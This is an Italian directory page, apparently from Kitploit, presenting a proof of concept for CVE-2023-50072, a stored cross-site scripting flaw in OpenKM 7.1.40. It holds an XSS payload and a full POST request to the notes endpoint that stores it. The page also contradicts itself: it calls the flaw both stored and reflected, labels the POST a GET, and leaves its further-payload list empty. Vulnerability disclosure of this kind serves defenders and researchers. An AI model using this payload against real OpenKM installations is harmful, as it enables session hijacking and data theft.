Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-50072 — Una vulnerabilità di cross-site scripting (XSS) memorizzato esiste in OpenKM versione 7.1.40. | Kitploit
Strumenti/GitHubGitHub/ahrixia/cve-2023-50072
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubahrixia/cve-2023-50072

CVE-2023-50072

Una vulnerabilità di cross-site scripting (XSS) memorizzato esiste in OpenKM versione 7.1.40.

Vedi Repository
422 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-50072

Esiste una vulnerabilità di cross-site scripting (XSS) persistente in OpenKM versione 7.1.40 (dbb6e88) con Professional Extension che consente a un utente autenticato di caricare una nota su un file che funge da payload XSS persistente. Qualsiasi utente che apre la nota di un file documento attiverà l'XSS.

Parametro vulnerabile: text

Exploit - Prova di concetto (POC)

Cross-site scripting (XSS) riflesso

root@kitploit:~
Payload :  
FINAL Payload (URL encoded) : <image/src/onerror%3dalert(1)>

Richiesta GET su [http://localhost/openkm/rest/note/nodes/NODE-ID] :

root@kitploit:~
POST /openkm/rest/note/nodes/34bc430a-e3db-4efa-8289-3d0894010f67 HTTP/2
Host: EXAMPLE.COM
Cookie: lang=en-GB; JSESSIONID=EC6EF7B1DB85C3A839C9D3054095AA8E
Content-Length: 23
Sec-Ch-Ua: "Chromium";v="117", "Not;A=Brand";v="8"
X-Requested-App: kcenter
Sec-Ch-Ua-Mobile: ?0
Authorization: OKM ey[REDACTED]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/plain, */*
Sec-Ch-Ua-Platform: "Windows"
Origin: https://EXAMPLE.COM
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://EXAMPLE.COM/openkm
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

text=<image/src/onerror%3dalert(1)>

Impatto

Lo XSS persistente consente agli attaccanti di iniettare script dannosi in un'applicazione web, che vengono salvati ed eseguiti quando altri utenti visualizzano la pagina interessata. Ciò può portare al furto di informazioni sensibili, al dirottamento della sessione o alla distribuzione di malware.

Schermata

openkm

Altri payload funzionanti

root@kitploit:~
Payload : 
FINAL Payload (URL encoded) : 
Scarica lo strumento